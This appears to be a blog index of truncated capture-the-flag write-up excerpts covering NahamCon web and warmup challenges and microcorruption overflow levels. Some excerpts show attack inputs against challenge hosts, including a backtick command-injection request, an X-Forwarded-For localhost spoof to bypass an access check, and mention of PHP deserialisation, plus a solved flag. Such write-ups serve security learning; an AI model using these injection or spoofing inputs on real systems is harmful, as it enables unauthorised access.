CTF

category web - medium solution We’re given an archive to download, agenttester.zip. This contained a Dockerfile and a python web application. The files in the archive had many secrets redacted which were set using environment variables. One specifically interesting one was CHALLENGE_FLAG, which we could assume was the target value to leak. The challenge URL dropped us on a page where we need to login. So, create an account, login and land on the home page of the agent tester....

category web - medium solution The challenge URL drops us on a page where we need to login. So, create an account, login and land on the home page of a blog. After creating a new post, you can see who visited your blog in the profile section. Poking around will reveal that if you tamper with your user agent string, that is what will show up in the analytics section....

category web - medium solution The challenge URL drops us on a page where we can submit cereals. We are also given two files to download, index.php & log.php. I quickly spotted an unsafe deserialisation bug in the provided files. The cleaned up and relevant PHP code from both files were: index.php <?php include 'log.php'; class CerealAndMilk { public $logs = "request-logs.txt"; public $request = ''; public $cereal = 'Captain Crunch'; public $milk = ''; public function processed_data($output) { echo "Deserilized data:<br> Coming soon....

category web - medium solution This was a tricker, but fun one. The challenge URL drops us on a login page with an OTP field. Signing up for an account responsed with a JSON structure containing a url key with an otpauth URI. Request POST /signup HTTP/1.1 Host: challenge.nahamcon.com:30809 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://challenge....

category warmups - easy solution The challenge URL had a web based echo service. Many special characters, except for < and ` were filtered. It took me a while but I found the param had command injection. For example: GET /?echo=`id` HTTP/1.1 Host: challenge.nahamcon.com:30074 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://challenge.nahamcon.com:30074/?echo=food Cookie: auth2=eyJpZCI6MX0.YEp7Wg.fHdsxIGEolHgYQD0d_cvExass8E; auth=eyJpZCI6MX0....

category web - easy solution The challenge URL returns the message Sorry, this page is not accessible externally. Add the X-Forwarded-For: 127.0.0.1 header to reveal the flag. GET / HTTP/1.1 Host: challenge.nahamcon.com:30903 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close X-Forwarded-For: 127.0.0.1 Cookie: auth2=eyJpZCI6MX0.YEp7Wg.fHdsxIGEolHgYQD0d_cvExass8E; auth=eyJpZCI6MX0.YEp7Wg.fHdsxIGEolHgYQD0d_cvExass8E Upgrade-Insecure-Requests: 1 The response has the flag. <p class="card-text"> <div class="alert alert-success" role="alert"> <b>Welcome!...

category warmups - easy solution The downloaded file contained a string, which looked like it was base64 encoded. The challenge title was also base64 reversed, esab64. ❯ cat esab64 mxWYntnZiVjMxEjY0kDOhZWZ4cjYxIGZwQmY2ATMxEzNlFjNl13X To solve, reverse the string, base64 decode and then reverse it again. import base64 with open("esab64", "r") as f: s = f.readline() s = s[::-1] d = base64.b64decode(s) print(d[::-1][:-1]) Running it gives us the flag. $ python3 solve.py b'flag{fb5211b498afe87b1bd0db601117e16e}'

category warmups - easy solution The downloaded file you get is an image, when opened looks like this: Output of exiftool shows that there is a thumbnail, with a hint to extract it right at the bottom. ❯ exiftool pollex.jpg ExifTool Version Number : 12.16 File Name : pollex.jpg Directory : . File Size : 37 KiB File Modification Date/Time : 2021:03:13 13:40:45+02:00 File Access Date/Time : 2021:03:15 09:53:11+02:00 File Inode Change Date/Time : 2021:03:15 09:53:11+02:00 File Permissions : rw-r--r-- File Type : JPEG File Type Extension : jpg MIME Type : image/jpeg JFIF Version : 1....

This post is part of the series of solving microcorruption.com ctf challenges which continues from the previous challenge called Johannesburg. This challenge is titled Santa Cruz. The challenge has the following description when you start: This is Software Revision 05. We have added further mechanisms to verify that passwords which are too long will be rejected. Maybe we are finally done with the overflow problems? This challenge took me quite a bit of time to solve thanks to the new checks that were introduced. Like, a really long time. Lets go through the process. ...

This post is part of the series of solving microcorruption.com ctf challenges which continues from the previous challenge called Montevideo. This challenge is titled Johannesburg. The challenge has the following description when you start: This is Software Revision 04. We have improved the security of the lock by ensuring passwords that are too long will be rejected. Alright. This might mean that we are done with the overflow challenges? Lets dive in! ...